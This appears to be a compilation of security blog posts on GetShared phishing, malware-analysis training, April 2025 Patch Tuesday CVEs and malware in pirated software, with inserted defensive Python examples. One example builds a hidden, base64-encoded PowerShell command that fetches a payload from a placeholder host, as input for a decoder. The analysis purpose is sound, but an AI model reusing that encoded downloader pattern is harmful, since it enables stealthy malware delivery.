GetShared phishing | Kaspersky official blog

A former colleague of ours recently received a suspicious email notification from GetShared — a genuine service he was unfamiliar with. Being the paranoid cautious type that he is (he did work at Kaspersky, after all), he didn’t click the link but instead forwarded the notification straight to us. A closer look at the email message confirmed it was a scam. Indeed, our email security statistics suggest that GetShared has been gaining popularity with scammers. We explain how GetShared is used in attacks, why attackers use it, and how to stay safe.

What a GetShared attack looks like

The victim receives a normal, authentic email notification from GetShared informing them that someone has sent them a file. The message specifies the file name and extension. For example, in the attack targeting our ex-colleague’s employer, it was “DESIGN LOGO.rar”.

Sample scam email sent as a GetShared notification

The message that accompanies the link employs a classic phishing trick: scammers inquire about prices for items supposedly listed in the attachment. To add a veneer of legitimacy, they ask about delivery time and payment details.

Why malicious actors use GetShared and other third-party services

Security solutions filter out the vast majority of spam, phishing, scam emails, and malicious attachments at the email gateway level. A popular and effective tactic for scammers trying to bypass these defenses is to send emails through legitimate services like Google Calendar or Dropbox. These services, naturally, are uncomfortable being unwitting accomplices in cybercrimes, so they constantly improve their own countermeasures, tighten signup rules, and so on. Therefore, scammers keep looking for new services to exploit. GetShared — a free service for sending large files — turned out to be yet another exploitable tool.

Signs that something’s phishy

Let’s step back from this specific case and GetShared for a moment. Ask yourself: is it really normal practice to send a business inquiry as a note in some random third-party file-sharing service? Assuming a hypothetical client has a genuine business need to transmit a file — say, documents relating to an order — via an external service, they’d typically arrange it first through standard email correspondence before sending you a barrage of notifications. This is business etiquette 101.

When someone asks you to view a text document on a third-party service, there can only be three explanations:

  • A security engine flags the document as spam, phishing, or scam.
  • The document contains links to a scam, phishing, or malicious website.
  • The document is infected, or the attachment is actually a malicious executable rather than a document.

In this particular instance, the service was used to distribute a text file containing a rather absurd request to get in touch with the malicious actors — they were trying to start a conversation to then develop the attack through social engineering.

Coming back to the email campaign we observed, this notification looks especially suspicious, primarily due to the glaring mismatch between the name of the file and the text accompanying it. The message hints at some list of goods, whereas the filename strongly suggests a design project.

Furthermore, take a close look at the sender’s address, which is stated clearly in the notification. A quick search for the domain name immediately reveals that this email address is likely used by scammers.
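The three signals the post describes (an archive instead of a document, a file name that does not match the message, a stated sender domain nobody in the company knows) can be applied mechanically at mail triage. The following is an added example, not Kaspersky's code; the notification text and all domains are constructed for it.

```python
"""Triage heuristics for file-sharing notification emails (GetShared-style).

Added example for this post, not Kaspersky's code. It encodes the three
signals the post describes: the shared file is an archive rather than a
document, the message text and the file name describe different things,
and the stated sender's domain is unknown to the recipient organisation.
The sample notification below is constructed; the domains are placeholders.
"""
import re
from email import message_from_string

# Constructed sample in the shape of the notification described in the post
SAMPLE_NOTIFICATION = """\
From: GetShared <noreply@getshared.example>
To: sales@victim-company.example
Subject: Someone sent you a file: DESIGN LOGO.rar

A file has been shared with you.
File: DESIGN LOGO.rar
Sent by: procurement@random-inquiry.example
Message: Please check the attached list of items and send us your best
price, delivery time and payment details.
"""

# Extensions that mean "not a document" when a sender claims to share a document
ARCHIVE_OR_EXEC = {"rar", "zip", "7z", "iso", "img", "exe", "scr", "js", "lnk"}
COMMERCE_WORDS = {"price", "quote", "quotation", "delivery", "payment", "invoice", "order"}
DESIGN_WORDS = {"design", "logo", "artwork", "mockup", "brand"}


def parse_notification(raw):
    """Pull the shared file name, the stated sender and the free-text message."""
    msg = message_from_string(raw)
    body = msg.get_payload()
    file_name = re.search(r"^File:\s*(.+)$", body, re.M).group(1).strip()
    stated_sender = re.search(r"^Sent by:\s*(\S+)$", body, re.M).group(1)
    message = re.search(r"^Message:\s*(.+)", body, re.M | re.S).group(1)
    return {"file_name": file_name, "stated_sender": stated_sender,
            "message": " ".join(message.split())}


def triage(raw, known_partner_domains):
    """Return the list of suspicion reasons; an empty list means no signal fired."""
    fields = parse_notification(raw)
    reasons = []

    # Signal 1: the "document" is really an archive or executable
    ext = fields["file_name"].rsplit(".", 1)[-1].lower()
    if ext in ARCHIVE_OR_EXEC:
        reasons.append(f"shared file is an archive/executable (.{ext}), not a document")

    # Signal 2: file name says "design project", message says "send us a price"
    name_words = set(re.findall(r"[a-z]+", fields["file_name"].lower()))
    msg_words = set(re.findall(r"[a-z]+", fields["message"].lower()))
    if name_words & DESIGN_WORDS and msg_words & COMMERCE_WORDS and not (msg_words & DESIGN_WORDS):
        reasons.append("file name suggests a design project but the message is a price inquiry")

    # Signal 3: the stated sender's domain is not an existing business partner
    domain = fields["stated_sender"].rsplit("@", 1)[-1].lower()
    if domain not in known_partner_domains:
        reasons.append(f"stated sender domain {domain} is not a known business partner")
    return reasons
```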

How to defend against such attacks

To protect your company from scam emails sent through GetShared or any other legitimate services, we recommend the following:

Kaspersky official blog – Read More

Why Practice Is Key to Training Top Malware Analysts and How ANY.RUN Supports It

While developing our Security Training Lab educational program, we at ANY.RUN have turned to well-established theories of education, cognitive skill development, and the psychology of learning. Their foundational principles emphasize one critical truth: practice is indispensable for mastering complex skills.  

In the field of cybersecurity, and especially in malware analysis, the ability to apply theoretical knowledge in real-world scenarios is what separates competent professionals from novices. Inspired by this understanding, we designed the Security Training Lab to bridge the gap between classroom theory and the practical demands of the cybersecurity industry. We believe students should be equipped to tackle real threats from day one.

As a malware analysis solutions developer, ANY.RUN has all the resources and capabilities to provide the audience of its educational program with as much practice as it’s ready to digest.  

How Security Training Lab Offers Practice-Oriented Training 

Of course, nobody is going to toss future malware analysts in at the deep end unprepared and watch them flounder in a lake of real cyber threats. Security Training Lab is based on 30 hours of academic content including texts and video lectures.

The program includes modules on:

  • Advanced static and dynamic malware analysis
  • Study of malware behavior, malicious scripts, files, and macros
  • The basics of encryption

The Program’s structure and contents

Interactive tasks and tests appear at the end of each module and in the final exam. But real-world examples of detonated, dissected, and analyzed malware run through the entire learning material, encouraging trainees to find an example or perform a task of their own to practice their newly acquired skills.

How Security Training Lab Benefits Universities

The emphasis on applicable knowledge and practical experience is not the only feature of the Security Training Lab that is valuable for educational organizations. As a ready-made, expert-supported solution, it offers universities the following benefits:

  • No setup hassle: full access to ANY.RUN’s Interactive Sandbox for instructors and students. The course is available and ready for use on the Seturon platform. There is no need to set up complex environments or worry about local security.
  • Up-to-date: based on the latest malware samples, techniques, and real-world scenarios, keeping the curriculum relevant. 
  • Scalable for classrooms and remote learners: supports self-paced, instructor-led, and hybrid learning formats. 
  • Built-in analytics: instructors can track progress and assess students’ practical skills. 

The Key to Effective Learning: Interactive Sandbox 

Students don’t just read about malicious scripts, ransomware, or phishing kits—they dissect them. Through ANY.RUN’s Interactive Sandbox, they gain full access to a virtualized environment where they can upload, execute, and analyze live threats. 

Public reports with malware samples submitted by ANY.RUN’s users

They also gain access to a repository of malware samples submitted by ANY.RUN’s user community of more than 500,000 cybersecurity professionals. These users (including 15,000 corporate SOC teams that face the most current and dangerous threats) leave public reports on their analysis sessions that students can explore and analyze on their own.

A task for working with public reports

All students of the Security Training Lab have unlimited access to the Sandbox, so they can go far beyond the examples and tasks in the program.

Launching a suspected malware sample analysis in sandbox’s virtual environment

For example, a student might analyze a phishing link disguised as a legitimate URL, interact with it in the sandbox, and observe how it attempts to steal credentials or deploy secondary malware. Another might de-obfuscate a malicious script, uncovering its hidden payload step-by-step.

Investigating a suspicious link in ANY.RUN’s Sandbox 

These exercises simulate the real-life scenarios analysts face — whether it’s investigating a targeted attack on a corporate network or responding to a widespread malware campaign. By engaging with authentic samples, students learn to recognize patterns, anticipate attacker tactics, and develop effective mitigation strategies. 


A Dive into Practice: Full Scope of Tools 

Of course, the hands-on part of the Security Training Lab curriculum is not based solely on ANY.RUN’s tools.

A number of modules introduce students to key professional tools

A malware analysis expert has to work with a whole arsenal of tools, so it is vital for students to start getting acquainted with them early and intensively.

Conclusion  

The cybersecurity industry is experiencing a global talent shortage, particularly in skilled threat researchers and malware analysts. With the Security Training Lab, we help to address this gap by providing a practice-first, job-relevant learning experience. 

Through hands-on training with real malware samples and simulations of workplace challenges, we’re preparing students not just to understand cyber threats, but to defeat them.  

By integrating ANY.RUN’s course into the academic program, universities meet the challenge of offering a competitive educational product, respond to market demands, and provide their students with the most promising career opportunities.


About ANY.RUN

ANY.RUN supports over 15,000 organizations across numerous industries, including banking, manufacturing, and healthcare. Our interactive malware analysis and threat intelligence tools allow companies and SOC teams to speed up their threat investigations, ensure proactive security, and build stronger and more resilient operations.

The post Why Practice Is Key to Training Top Malware Analysts and How ANY.RUN Supports It appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Microsoft Patch Tuesday for April 2025 — Snort rules and prominent vulnerabilities


Microsoft has released its monthly security update for April 2025, which includes 126 vulnerabilities affecting a range of products, including 11 that Microsoft marked as “critical”.

In this month’s release, none of the included vulnerabilities have been observed by Microsoft to be exploited in the wild. The eleven “critical” entries are all remote code execution (RCE) vulnerabilities, four of which have been marked as “Exploitation more likely”. 

Two of the “critical” vulnerabilities listed affect components of the Windows Remote Desktop Services. 

CVE-2025-27480 and CVE-2025-27482 are RCE vulnerabilities in components of the Remote Desktop Gateway Service. Both vulnerabilities were given a CVSS 3.1 score of 8.1. To successfully exploit these, an attacker could connect to a system with the Remote Desktop Gateway role and trigger a race condition to create a use-after-free scenario, potentially allowing arbitrary code to be executed. Microsoft has assessed that the attack complexity is “high” and that exploitation is “More likely”.

CVE-2025-26663 is an RCE vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) and has been given a CVSS 3.1 score of 8.1. This could be exploited by an attacker by sending a specially crafted LDAP call to trigger a use-after-free vulnerability, allowing arbitrary code to be executed in the context of the LDAP service. An attacker could initiate this by sending a victim an email or message containing a malicious link. Microsoft has assessed that exploitation is “more likely” and that the attack complexity is “high”.

CVE-2025-26670 is an RCE vulnerability in the Lightweight Directory Access Protocol (LDAP) Client and has been given a CVSS 3.1 base score of 8.1. An attacker could exploit this vulnerability by sending sequential specially crafted LDAP requests to a vulnerable LDAP server. Successful exploitation would require an attacker to win a race condition, which could result in a use-after-free that would allow for arbitrary code execution. Microsoft states that exploitation of this vulnerability is “More likely” and that the attack complexity is “high”.

CVE-2025-26686 is an RCE vulnerability in Windows TCP/IP and has been given a CVSS 3.1 base score of 7.5. Due to improperly locked memory in Windows TCP/IP, this vulnerability could allow an attacker to execute arbitrary code over a network. To exploit this, an attacker must wait for a user to initiate a connection and send a DHCPv6 request, to which the attacker would reply with a DHCPv6 response containing a fake IPv6 address. Successful exploitation requires the attacker to win a race condition and make several preparations in the target environment beforehand. Due to this complexity, Microsoft has determined that exploitation is “Less likely”.

CVE-2025-27491 is an RCE vulnerability in Windows Hyper-V and has a CVSS 3.1 base score of 7.1. An attacker with guest privileges on a network could exploit this by convincing a victim to click a link to a malicious site. Microsoft has determined that exploitation of this vulnerability is “Less likely” and that the attack complexity is “high”.

CVE-2025-29791 is an RCE vulnerability in Microsoft Excel and has a CVSS 3.1 base score of 7.8. An attacker could exploit this by sending a specially crafted document to a victim that triggers a type confusion when opened. Once triggered, the type confusion could lead to arbitrary code execution. Microsoft has assessed that exploitation of this vulnerability is “Less likely”.

CVE-2025-27752 is another RCE vulnerability in Microsoft Excel and has a CVSS 3.1 score of 7.8. This is a heap overflow vulnerability and can be exploited by an attacker to locally execute arbitrary code. It has been assessed that exploitation of this vulnerability is considered “Less likely”.

CVE-2025-27745, CVE-2025-27748 and CVE-2025-27749 are RCE vulnerabilities in Microsoft Office and all have a CVSS 3.1 base score of 7.8. These could be exploited by an attacker by triggering a use-after-free scenario, allowing for the execution of arbitrary code. Microsoft has determined that exploitation for each is considered “Less likely”.

Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that exploitation is “More likely”:

  • CVE-2025-27472 – Windows Mark of the Web Security Feature Bypass Vulnerability
  • CVE-2025-27727 – Windows Installer Elevation of Privilege Vulnerability
  • CVE-2025-29792 – Microsoft Office Elevation of Privilege Vulnerability
  • CVE-2025-29793 – Microsoft SharePoint Remote Code Execution Vulnerability
  • CVE-2025-29794 – Microsoft SharePoint Remote Code Execution Vulnerability
  • CVE-2025-29809 – Windows Kerberos Security Feature Bypass Vulnerability
  • CVE-2025-29812 – DirectX Graphics Kernel Elevation of Privilege Vulnerability
  • CVE-2025-29822 – Microsoft OneNote Security Feature Bypass Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 58316, 58317, 64432, 64746 – 64757, 64760 – 64762. There are also these Snort 3 rules: 301176 – 301179.
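A deployment check a defender would run after reading the paragraph above: expand the published SID list (including its en-dash ranges) and report which of those SIDs are absent from, or commented out in, a local Snort rules file. This is an added example, not Talos or Cisco tooling; the rules-file excerpt is constructed and its rule bodies are placeholders.

```python
"""Check a local Snort rules file for the SIDs named in this release.

Added example, not Talos' or Cisco's tooling. It expands the SID list from
the Patch Tuesday post (including the en-dash ranges) and reports which of
those SIDs a given rules file is missing. The rules-file content is constructed.
"""
import re

# SID lists exactly as printed in the post (note the en dashes in the ranges)
RELEASE_SIDS_TEXT = "58316, 58317, 64432, 64746 – 64757, 64760 – 64762"
SNORT3_SIDS_TEXT = "301176 – 301179"

# Constructed excerpt of a local rules file: three release SIDs present,
# one of them disabled by a comment, the rest absent.
SAMPLE_RULES = """\
# local excerpt, constructed for this example
alert tcp $EXTERNAL_NET any -> $HOME_NET 443 (msg:"constructed rule"; sid:58316; rev:3;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 3391 (msg:"constructed rule"; sid:64746; rev:1;)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 389 (msg:"constructed rule"; sid:64747; rev:1;)
"""


def expand_sid_list(text):
    """Turn '58316, 64746 – 64757' into the full set of integer SIDs."""
    sids = set()
    for part in text.split(","):
        # accept a plain hyphen or the en dash used in the blog text
        bounds = re.split(r"\s*[-–]\s*", part.strip())
        lo, hi = int(bounds[0]), int(bounds[-1])
        sids.update(range(lo, hi + 1))
    return sids


def sids_in_rules(rules_text):
    """Collect every sid:N from active (uncommented) rule lines only."""
    found = set()
    for line in rules_text.splitlines():
        if line.lstrip().startswith("#"):
            continue  # a disabled rule provides no coverage
        found.update(int(s) for s in re.findall(r"\bsid:\s*(\d+)\s*;", line))
    return found


def missing_sids(rules_text, release_text):
    """SIDs from the release that the local rules file does not actively load."""
    return sorted(expand_sid_list(release_text) - sids_in_rules(rules_text))
```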

Cisco Talos Blog – Read More

How MSSP Expertware Uses ANY.RUN’s Interactive Sandbox for Faster Threat Analysis

At ANY.RUN, we love hearing about clients’ experiences. Quality feedback helps us improve and gives new and existing users a clearer understanding of our tools in actual security scenarios. 

That’s why when we spoke with Augustin Alexandrovici, who leads Cyber Intelligence Operations at Expertware, we knew we had to share our conversation.  

Check out the highlights to see how a Managed Security Service Provider employs ANY.RUN in its operations. 

Company Overview 

Expertware is a leading IT consultancy with over 18 years of experience, specializing in cybersecurity and Security Operations Center (SOC) services. With a dedicated team of over 30 cyber experts, we can seamlessly build or extend internal teams to address evolving threats and ensure robust protection for businesses. 

Our expertise spans AI and machine learning, full-stack development, IT architecture, and business optimization. Having completed over 500 successful projects for leading European clients across industries such as banking, insurance, retail, telecom, and more, we deliver innovative, high-impact solutions that foster growth and resilience. 

What Made Expertware Look for a Malware Sandbox 

We started looking for a sandbox because we wanted to offer our customers an in-depth view of security incidents targeting their IT infrastructure.

Before, we had to manually set up reverse-engineering environments, which was a time-consuming process. The extra steps required slowed down our ability to analyze and respond to malware threats in an efficient way. 

We also wanted to improve the average turnaround time for malware investigations to make operations faster and be able to process more threats.  

Another challenge we sought to address was the limited visibility into attacks. We needed a solution that would present us with an intuitive and streamlined view of threats’ entire kill chain. 

With all of these taken into consideration, ANY.RUN’s sandbox became our choice. 


One of the main factors behind our decision was the interactivity. It instantly solved the problem of building and maintaining our custom VMs for malware analysis. ANY.RUN has enabled us to actually interact with malicious files on the fly, which saves us from risky manual setups and cuts down on the resources we allocate to daily tasks. 

How Expertware Uses ANY.RUN

Our organization has been using ANY.RUN for over a year. Initially, we started with a proof of concept (POC) phase to see how it would fit into our SOC workflow, and we found it very effective, so we fully integrated it soon afterwards. 

Now we use all the core products provided by ANY.RUN: the Interactive Sandbox, TI Feeds, and Threat Intelligence Lookup complementing and enriching our SIEMBIOT cyber security. Our team relies on them for malware analysis, dynamic execution of files, and rapid threat intelligence analysis. 

We use the sandbox specifically for: 

  • Malware Investigations: We submit suspicious files for dynamic analysis to observe malicious behavior, network indicators, and potential dropper actions. 
  • Phishing Analysis: We examine advanced phishing campaigns to see how attachments or malicious scripts are executed within a controlled environment. 
  • Indicator Extraction and Mapping: We extract IOCs, map the full scope of the attack to the MITRE ATT&CK framework, and quickly integrate them into our threat intelligence feeds and detection systems. 
  • Training & Collaboration: We share interactive reports across the SOC and Incident Response teams to facilitate collaborative analysis and help junior analysts develop their skills. 

Reach out to our experts
to integrate ANY.RUN’s products in your organization 



Contact us


Examples of Cyber Threats ANY.RUN Helps Address 

At Expertware, we routinely confront threats like advanced infostealers (e.g., RedLine, Raccoon Stealer), persistent backdoors (like NanoCore or Remcos), and botnet malware (such as Emotet). ANY.RUN’s Interactive Sandbox and real-time analysis tools are invaluable in helping us quickly detect, investigate, and neutralize these evolving threats. 

Notable Use Case: XLoader Phishing Attack 

One notable case involved a highly obfuscated phishing campaign distributing XLoader malware in a multi-stage infection chain. Initially, the malicious attachment was a seemingly benign Microsoft Office document containing VBA macros. Once the macro was enabled, it executed a PowerShell command that retrieved additional payloads from a remote server.

This was followed by fileless techniques, such as reflective loading of DLLs directly into memory, making static detection difficult. When we ran the sample in ANY.RUN’s Interactive Sandbox, we could manually walk through each stage of the infection process. Specifically: 

  1. Macro Execution: We triggered the VBA macro inside the sandbox, capturing real-time logs of spawned processes (e.g., powershell.exe) and network connections.
  2. Decoding the PowerShell Script: The script was obfuscated using string concatenation and base64 encoding. ANY.RUN’s interactive approach let us step through and decode the script in real time, exposing the URLs used for Command & Control.
  3. Memory Analysis: By pausing and resuming processes, we pinpointed the exact moment the additional payload was written directly to memory. This was crucial in revealing the second-stage DLL that XLoader injected, bypassing traditional on-disk detection.
  4. Network Traffic Inspection: We observed the malware connecting to its C2 infrastructure, sending beacon requests with system reconnaissance data. ANY.RUN’s detailed packet capture allowed us to extract and analyze these indicators (e.g., domain names, IP addresses, and request parameters).
  5. Persistence Mechanisms: XLoader used several registry-based techniques to maintain persistence. We tracked registry changes within the sandbox session, which helped us craft custom detection rules in our SIEM and endpoint solutions.

Without the ability to dynamically interact with the malware (e.g., clicking through the macros, responding to execution prompts, and examining in-memory behavior), many of these steps would have remained hidden, especially given the extensive use of fileless and obfuscation techniques. ANY.RUN gave us the granularity to uncover each stage, correlate events, and produce comprehensive IOCs to better protect our environment and inform our incident response. 
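The two obfuscation layers named in the decoding step above, reproduced offline as an added example (not Expertware's or ANY.RUN's code): a base64 -EncodedCommand wrapper around a script that assembles its download URL from concatenated string fragments, and the analyst-side routine that peels both layers to recover the URL as an IOC. The command line is constructed here to mimic a sandbox process log; stage2.example.invalid is a placeholder.

```python
"""De-obfuscating the kind of PowerShell stage described in the XLoader case.

Added example, not Expertware's or ANY.RUN's code. It reproduces offline the
two layers the interview mentions: a base64 -EncodedCommand wrapper and
string concatenation hiding the download URL. The command line below is
constructed to mimic a sandbox process log; stage2.example.invalid is a placeholder.
"""
import base64
import re

# Constructed inner script: the URL is split into concatenated fragments so a
# plain string search for "http" finds nothing.
_INNER_SCRIPT = (
    "$u = 'ht' + 'tp://' + 'stage2.' + 'example' + '.invalid' + '/upd' + 'ate.bin'; "
    "$w = New-Object Net.WebClient; "
    "$d = $w.DownloadData($u)"
)
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE encoded script.
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    _INNER_SCRIPT.encode("utf-16-le")).decode("ascii")

_ENC_FLAG = re.compile(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_URL = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\";)]*)?")


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -enc/-EncodedCommand, or None if absent."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def fold_concatenation(script):
    """Merge 'a' + 'b' chains until no adjacent pair of literals remains."""
    prev = None
    while prev != script:
        prev, script = script, _CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", script)
    return script


def extract_c2_urls(cmdline):
    """Decode, fold, and return the URLs an analyst would record as IOCs."""
    script = decode_encoded_command(cmdline) or cmdline
    folded = fold_concatenation(script)
    return sorted(set(_URL.findall(folded)))
```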

In short, ANY.RUN’s interactive approach was critical in dissecting this complex multi-stage XLoader campaign and swiftly mitigating its impact across our network. 

Security and Operational Improvements After Adopting ANY.RUN 

With ANY.RUN, our malware investigation and IOC extraction processes have seen over a 50% reduction in turnaround time.  

The time saved in malware investigations means threats are contained and remediated faster, right? So, I believe the real added value is the opportunity to reduce potential damage. Which is really the one and only scope of our work. 


Process tree in ANY.RUN showing the execution chain of the Formbook malware 

The visual process tree and network analysis allow us to see an attack’s full scope in one place, which really speeds up our containment and remediation processes. 

ANY.RUN generates analysis reports that can be shared via a link 

Plus, collaborating got easier—everyone’s on the same page when we can share those interactive reports. 

Implementation Challenges and Solutions 

To integrate ANY.RUN into our SIEM and SOAR platforms for real-time data flow, we used APIs and custom scripts, supported by OpenCTI integration. Initial challenges included interoperability issues with our Filigran system, data formatting mismatches, and security constraints. Collaboration with vendors and iterative testing resolved these issues, achieving reliable performance. 

To help colleagues fully utilize ANY.RUN’s interactive features, we conducted in-house training sessions. These covered the platform’s core functionalities, best practices for malware analysis, and real-time collaboration techniques. This ensured all team members, from junior analysts to experienced responders, could effectively use the new workflows and maximize the platform’s capabilities. 


Employee Feedback 

Our employees are generally very positive about ANY.RUN’s products. Analysts appreciate the intuitive interface and the ability to manipulate malware in real-time. Junior analysts find it educational, since they can watch suspicious processes unfold step by step, learning about Tactics, Techniques, and Procedures (TTPs) in a hands-on manner. Senior analysts value the time savings and the visual clarity of the results. 


Advice for Those Planning to Integrate ANY.RUN 

We advise starting with a pilot project on the most suspicious files—you’ll see the value right away. Take advantage of ANY.RUN’s API documentation and support channels to make integration smoother. And if you’re training new analysts, definitely have them dive into the interactive side of things. It’s a real game-changer. 

Plans 

We’re upping our SOC game by adding more automation. ANY.RUN’s API integration makes it easy to connect with our CTI/SOAR platform, so when something malicious is detected, it can trigger containment steps automatically. ANY.RUN will be a core piece of our future setup. 

Conclusion 

A big thank you to Augustin and Expertware for sharing their insight into the day-to-day operations of a security team during our meeting. The expertise and unique perspectives you provided as part of the interview will help other organizations understand the benefits of integrating ANY.RUN’s Interactive Sandbox for stronger security.

If you are using ANY.RUN’s products and are willing to share your experiences with the community, please send us an email at content@any.run.

About ANY.RUN

ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.

With our cloud-based Interactive Sandbox, security teams can safely analyze and understand threats targeting Windows, Linux, and Android environments in less than 40 seconds and without the need for complex on-premise systems. Combined with our Threat Intelligence solutions, TI Lookup, YARA Search, and Feeds, we equip businesses to speed up investigations, reduce security risks, and improve teams’ efficiency.

The post How MSSP Expertware Uses ANY.RUN’s Interactive Sandbox for Faster Threat Analysis appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

Year in Review: Key vulnerabilities, tools, and shifts in attacker email tactics


Over the next few weeks, we’re breaking down the most critical sections of our 2024 Year in Review.

This week, we examine the most frequently targeted vulnerabilities—particularly those affecting network infrastructure. We also detail a noticeable shift in adversary behavior, as threat actors move away from time-sensitive lures in phishing campaigns. Finally, we highlight the tools most commonly leveraged by attackers last year and provide guidance on how to detect their presence in your environment.

Download the full report for a deeper understanding of these trends and actionable steps to strengthen your defenses.

Only have 60 seconds? Here’s a roundup for you on this topic:

Cisco Talos Blog – Read More

What happens to your computer when you download pirated software | Kaspersky official blog

What do you do when you need a program but can’t buy an official license yet? Correct answer: “Use the trial version” or “Find a free alternative.” Wrong answer: “Search online for a cracked version.”

Sketchy alternative sources are known to offer cracked versions of software, along with other goodies. After wading through sites stuffed with ads, you may get the program you want (usually minus the future updates and network functionality), but with a miner, stealer, or whatever else thrown in for good measure.

Based on real-world examples, we explain why you should avoid sites that offer instant downloads of in-demand programs.

Miner and stealer on SourceForge

SourceForge was once the largest site for all things open source, the forerunner of GitHub. But don’t think that SourceForge is dead – today it provides software hosting and distribution services. Its software portal hosts multiple projects, uploaded by anyone who wants to.

And, as with GitHub, it’s this cosmopolitanism that is a barrier to high-level security. Let’s take just one example: our experts found a project called officepackage on SourceForge. At first glance, it looks harmless: a clear description, no-nonsense name, even a positive review.

“Officepackage” page on SourceForge

But what if we told you that the description and files were copied outright from an unrelated project on GitHub? Alarm bells are already ringing. That said, no malware lands on your computer when you click the Download button – the project is apparently clean. Apparently, because the malicious payload was not distributed directly through the officepackage project, but through the web page associated with it. How is this possible?

The fact is that every project created on SourceForge gets its own domain name and hosting on sourceforge.io. So a project named officepackage is given a web page at officepackage.sourceforge[.]io. Such pages are easily indexed by search engines and rank high in search results. This is how attackers attract victims.

Visiting officepackage.sourceforge[.]io from a search engine brought users to a page offering downloads of almost any version of the Microsoft Office suite. But, as ever, the devil was in the detail: when you hovered over the Download button, the browser’s status bar showed a link to https[:]//loading.sourceforge[.]io/download. Spotted the trap? The new link has nothing to do with officepackage; loading is an entirely different project.

The “Download” button on the “officepackage” page of the SourceForge software portal leads to a completely different project

And after clicking, users were redirected not to the page of the loading project, but to another intermediary site with another Download button. And only after clicking this did the user, weary of surfing, finally receive a file – an archive named vinstaller.zip. Inside was another archive, and inside this second archive was a malicious Windows Installer.
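The check the post describes doing by hand (hover over the Download button and compare the link's host with the page you are on), as an added example that is not Kaspersky's code: it flags download-labelled links that leave the project's own sourceforge.io subdomain. The HTML is constructed to mirror the officepackage/loading pattern above.

```python
"""Flag download links that leave a project's own sourceforge.io subdomain.

Added example, not Kaspersky's code. Every SourceForge project gets
<project>.sourceforge.io, so a Download button on officepackage's page that
resolves to loading.sourceforge.io belongs to a different project. The HTML
below is constructed; the hosts mirror the pattern described in the post.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed page in the shape described in the post
PAGE_URL = "https://officepackage.sourceforge.io/"
SAMPLE_HTML = """
<a href="/docs/readme.html">Documentation</a>
<a href="https://loading.sourceforge.io/download" class="btn">Download</a>
<a href="https://sourceforge.net/projects/officepackage/">Project page</a>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def project_label(host):
    """'officepackage.sourceforge.io' -> 'officepackage'; None for any other host."""
    parts = (host or "").lower().split(".")
    if len(parts) == 3 and parts[1:] == ["sourceforge", "io"]:
        return parts[0]
    return None


def foreign_download_links(page_url, html):
    """Return (link text, target host) for download links owned by another project or site."""
    collector = _LinkCollector()
    collector.feed(html)
    own = project_label(urlsplit(page_url).hostname)
    flagged = []
    for href, text in collector.links:
        if "download" not in text.lower():
            continue  # only the buttons a visitor would actually click to get the file
        target = urlsplit(urljoin(page_url, href)).hostname  # resolves relative hrefs
        if project_label(target) != own:
            flagged.append((text, target))
    return flagged
```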

At the heart of this evil nesting doll were two nasties: instead of Microsoft products, a miner and ClipBanker – malware for substituting crypto wallet addresses in the clipboard – were let loose on the victim’s device after running the installer. Details of the infection scheme can be found in the full version of the study on our Securelist blog.

Malicious TookPS installer disguised as legitimate software

Cybercriminals do not limit themselves to SourceForge and GitHub. In another recent case unearthed by our experts, attackers were found distributing the malicious TookPS downloader, already familiar to us from the fake DeepSeek and Grok clients, through fake websites offering free downloads of specialized software. We discovered a whole series of such sites offering users cracked versions of UltraViewer, AutoCAD, SketchUp and other popular professional software, meaning that the attack was not only aimed at home users, but also at professional freelancers and organizations. Other malicious files detected included the names Ableton.exe and QuickenApp.exe, purported versions of the popular music creation and money management applications.

Fake pages distributing TookPS


By circuitous means, the installer downloaded two backdoors to the victim’s device: Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon. See another Securelist post to find out exactly how the malware was delivered to the victim’s device. The malware gave the attackers full access to the victim’s computer.

How to protect yourself

First, do not download pirated software. Under any circumstances. Ever. A cracked program may be temptingly free and instantly available, but the price you pay will be measured not in money, but in data – your data. And no, that doesn’t mean family photos and chats with friends. Cybercriminals are after your crypto wallets, payment card details, account passwords – and even your computer’s resources for cryptocurrency mining.

Here’s a list of rules we recommend for anyone who uses SourceForge, GitHub and other software portals.

  • If you can’t buy the full version of an application, use alternatives or trial versions, not cracked software. You might not get the full functionality, but at least you won’t be running a binary of unknown provenance.
  • Only download programs from trusted sources. As SourceForge and GitHub practice shows, even then you should proceed with caution and scan all downloaded files with an antivirus.
  • Protect your cryptocurrency and banking data with reliable tools. Treat virtual wallets with the same reverence as physical ones.

Further reading in support of not downloading pirated software:

Kaspersky official blog – Read More

Year in Review: In conversation with the report’s authors


